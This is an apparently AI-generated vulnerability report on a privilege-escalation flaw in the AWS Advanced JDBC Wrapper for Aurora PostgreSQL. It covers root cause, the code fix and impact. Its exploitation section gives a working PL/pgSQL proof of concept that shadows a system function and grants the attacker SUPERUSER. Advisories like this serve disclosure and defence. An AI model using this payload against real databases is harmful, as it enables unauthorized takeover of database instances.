CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-11400

CVE-2026-11400: Privilege Escalation via Untrusted Search Path in AWS Advanced JDBC Wrapper

Alon Barad
Alon Barad
Software Engineer

Jul 18, 2026·6 min read·1 visit

Executive Summary (TL;DR)

A schema-hijacking vulnerability in the AWS Advanced JDBC Wrapper for Aurora PostgreSQL allows authenticated low-privilege users to execute code as rds_superuser when an administrator connects using the affected library, caused by a failure to qualify system function queries.

An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.

Vulnerability Overview

The AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL provides enhanced database features, including high-availability failover tracking, read/write splitting, and topology discovery. To support these capabilities, the wrapper utilizes plugins like GlobalDatabasePlugin to inspect the cluster's topology. The driver executes periodic, background queries against system metadata tables and specialized functions to verify whether the target node is a writer or reader instance.

These automated background checks are executed inside the active database session of the client application. Consequently, if a highly privileged user, such as an administrator or service account with the rds_superuser role, initiates a connection, the wrapper's background queries execute with those same elevated capabilities.

The vulnerability is classified under CWE-426 (Untrusted Search Path / Schema Hijacking). Because the internal queries executed by the wrapper fail to explicitly specify the schema namespace, PostgreSQL resolves system function calls dynamically by scanning the schemas listed in the active session's search_path. This behavior presents an attack surface where lower-privileged database users with schema-write capabilities can intercept administrative execution flows.

Root Cause Analysis

The fundamental flaw resides within the PostgreSQL identifier resolution process combined with unqualified query generation in software.amazon.jdbc.dialect.GlobalAuroraPgDialect.

When executing queries, PostgreSQL relies on the search_path configuration parameter to resolve names of tables, views, and functions that are not explicitly prefixed by a schema. By default, the search_path parameter is set to "$user", public. In a default configuration, any user has write (CREATE) access to the public schema, allowing low-privileged database accounts to define custom functions within it.

Prior to version 4.0.1, the driver executed topology detection queries such as SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, VISIBILITY_LAG_IN_MSEC, AWS_REGION FROM aurora_global_db_instance_status(). Because the query refers to aurora_global_db_instance_status() without a schema prefix (such as pg_catalog.), PostgreSQL traverses the search_path. It looks for the function in the current user's schema first, then in the public schema, and only checks the system-level catalog (pg_catalog) if it is not found elsewhere. An attacker can construct a malicious function of the same name and signature in the public schema to override the legitimate system function.

Code Analysis

The vulnerability is exposed in GlobalAuroraPgDialect.java. A comparative analysis of the code-level modifications implemented in the patch shows the remediation strategy.

Before the fix, the queries were defined with unqualified function calls as shown below:

// Vulnerable Code Path
public class GlobalAuroraPgDialect extends AuroraPgDialect implements GlobalAuroraTopologyDialect {
  protected static final String GLOBAL_STATUS_FUNC_EXISTS_QUERY = 
      "select 'aurora_global_db_status'::regproc";
  protected static final String GLOBAL_INSTANCE_STATUS_FUNC_EXISTS_QUERY = 
      "select 'aurora_global_db_instance_status'::regproc";
  protected static final String GLOBAL_TOPOLOGY_QUERY = 
      "SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, "
          + "VISIBILITY_LAG_IN_MSEC, AWS_REGION "
          + "FROM aurora_global_db_instance_status()";
  protected static final String REGION_COUNT_QUERY = 
      "SELECT count(1) FROM aurora_global_db_status()";
  protected static final String REGION_BY_INSTANCE_ID_QUERY = 
      "SELECT AWS_REGION FROM aurora_global_db_instance_status() WHERE SERVER_ID = ?";
}

The patch in commit 01be7ea47b13cd98754fff459ba95a97191cbd41 resolves the vulnerability by prepending the safe system catalog namespace pg_catalog. to all target functions:

// Patched Code Path
public class GlobalAuroraPgDialect extends AuroraPgDialect implements GlobalAuroraTopologyDialect {
  protected static final String GLOBAL_STATUS_FUNC_EXISTS_QUERY = 
      "select 'pg_catalog.aurora_global_db_status'::regproc";
  protected static final String GLOBAL_INSTANCE_STATUS_FUNC_EXISTS_QUERY = 
      "select 'pg_catalog.aurora_global_db_instance_status'::regproc";
  protected static final String GLOBAL_TOPOLOGY_QUERY = 
      "SELECT SERVER_ID, CASE WHEN SESSION_ID = 'MASTER_SESSION_ID' THEN TRUE ELSE FALSE END, "
          + "VISIBILITY_LAG_IN_MSEC, AWS_REGION "
          + "FROM pg_catalog.aurora_global_db_instance_status()";
  protected static final String REGION_COUNT_QUERY = 
      "SELECT count(1) FROM pg_catalog.aurora_global_db_status()";
  protected static final String REGION_BY_INSTANCE_ID_QUERY = 
      "SELECT AWS_REGION FROM pg_catalog.aurora_global_db_instance_status() WHERE SERVER_ID = ?";
}

By forcing the pg_catalog namespace prefix, PostgreSQL's parser bypasses user-writable schemas completely during symbol resolution. This stops standard users from shadowing system functions.

Exploitation Methodology

To exploit this vulnerability, an attacker must have access to a database account with permissions to connect and write to a schema in the default search path (typically public). No administrative permissions are required initially.

The attacker creates a custom table-returning function that matches the identifier and signature used by the target dialect topology check. This malicious function executes payload queries and returns structure-compliant placeholder records to avoid triggering client-side application exceptions.

-- Step 1: Create a malicious function matching the expected topology signature
CREATE OR REPLACE FUNCTION public.aurora_global_db_instance_status()
RETURNS TABLE (
    SERVER_ID text,
    SESSION_ID text,
    VISIBILITY_LAG_IN_MSEC integer,
    AWS_REGION text
) AS $$
BEGIN
    -- Step 2: Payload executing administrative operations under victim context
    EXECUTE 'ALTER ROLE low_priv_attacker WITH SUPERUSER;';
    
    -- Step 3: Return mock values to allow driver flow to complete gracefully
    RETURN QUERY SELECT 'primary-node'::text, 'MASTER_SESSION_ID'::text, 0::integer, 'us-east-1'::text;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

Once the function is registered, the attacker waits for a user with administrative privileges to connect to the database through an application using the affected JDBC wrapper. Upon connection, the wrapper issues the background topology query. PostgreSQL evaluates the search path, resolves aurora_global_db_instance_status to public.aurora_global_db_instance_status(), executes the payload under the administrator's context, and promotes the attacker's account to a superuser role.

Impact Assessment

The successful exploitation of CVE-2026-11400 results in complete database compromise. Because the driver queries run inside the security context of the user establishing the active database connection, any administrative operations contained within the attacker's function run with the credentials of that connected user.

If the victim is an administrative service or possesses the rds_superuser role, the attacker achieves full administrative control over the PostgreSQL database instance. This administrative access allows attackers to bypass security boundaries, read, alter, or delete sensitive tables, access stored credentials, and compromise downstream database client sessions.

This vulnerability is characterized by a low attack complexity. However, it requires user interaction, as a privileged user must initiate a database connection via the vulnerable wrapper to trigger the payload execution. The CVSS score is evaluated as 8.0 (High), reflecting a high impact on database confidentiality, integrity, and availability.

Official Patches

Amazon Web ServicesAWS Advanced JDBC Wrapper 4.0.1 Release Details

Fix Analysis (2)

Technical Appendix

CVSS Score
8.0/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
EPSS Probability
0.30%
Top 78% most exploited

Affected Systems

AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL

Affected Versions Detail

Product
Affected Versions
Fixed Version
AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL
Amazon Web Services
>= 3.0.0, < 4.0.14.0.1
AttributeDetail
CWE IDCWE-426
Attack VectorNetwork
CVSS v3.1 Score8.0
EPSS Score0.00305
Exploit Statuspoc
CISA KEV StatusNo

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1548Abuse Elevate Control Mechanism
Privilege Escalation
CWE-426
Untrusted Search Path

The product uses an untrusted search path that contains namespaces, directories, or libraries that are outside of the product's direct control, which can allow malicious code to run.

Vulnerability Timeline

Version 4.0.0 released by maintainers
2026-05-06
Commit 01be7ea47b13cd98754fff459ba95a97191cbd41 submitted to qualify topology-discovery queries
2026-05-07
Maintainers tag and release the 4.0.1 patch version
2026-05-13
CVE-2026-11400 is officially published in the CVE and NVD databases
2026-06-05

References & Sources

  • [1]Official AWS Security Advisory
  • [2]AWS Advanced JDBC Wrapper 4.0.1 Release Details
  • [3]Official CVE Record
  • [4]Code Fix - Dialect Schema Qualification (Commit 01be7ea4)

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•6 minutes ago•GHSA-8RQH-VXPR-X77P
4.3

GHSA-8RQH-VXPR-X77P: Stored Cross-Site Scripting via MIME Type Spoofing in Plone REST API

A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.

Amit Schendel
Amit Schendel
0 views•7 min read
•about 2 hours ago•CVE-2026-27771
8.2

CVE-2026-27771: Authentication Bypass and Information Disclosure in Gitea Container and Composer Registries

CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.

Alon Barad
Alon Barad
3 views•7 min read
•about 3 hours ago•GHSA-CVPC-HCCG-WMW4
8.8

GHSA-CVPC-HCCG-WMW4: Missing Authorization in Formie Administrative Settings Allows Privilege Escalation

A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.

Amit Schendel
Amit Schendel
2 views•6 min read
•about 4 hours ago•CVE-2026-53598
7.5

CVE-2026-53598: Arbitrary File Read via File Reference Expansion in Microsoft Prompty

CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.

Amit Schendel
Amit Schendel
4 views•6 min read
•about 5 hours ago•GHSA-MFR4-MQ8W-VMG6
7.3

GHSA-MFR4-MQ8W-VMG6: Path Traversal in proot-distro copy Command Allows Container Escape

A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.

Alon Barad
Alon Barad
5 views•7 min read
•about 9 hours ago•GHSA-8QQM-FP2Q-V734
8.2

GHSA-8QQM-FP2Q-V734: Authorization Bypass in Skipper's Open Policy Agent Integration

An authorization bypass vulnerability in the Open Policy Agent (OPA) integration of the Skipper HTTP router allows unauthenticated remote attackers to bypass OPA policy inspection. When an incoming HTTP request declares a Content-Length exceeding Skipper's configured maxBodyBytes limit, Skipper bypasses body parsing and forwards an empty document to OPA, while transmitting the full, uninspected payload intact to the upstream backend.

Amit Schendel
Amit Schendel
6 views•6 min read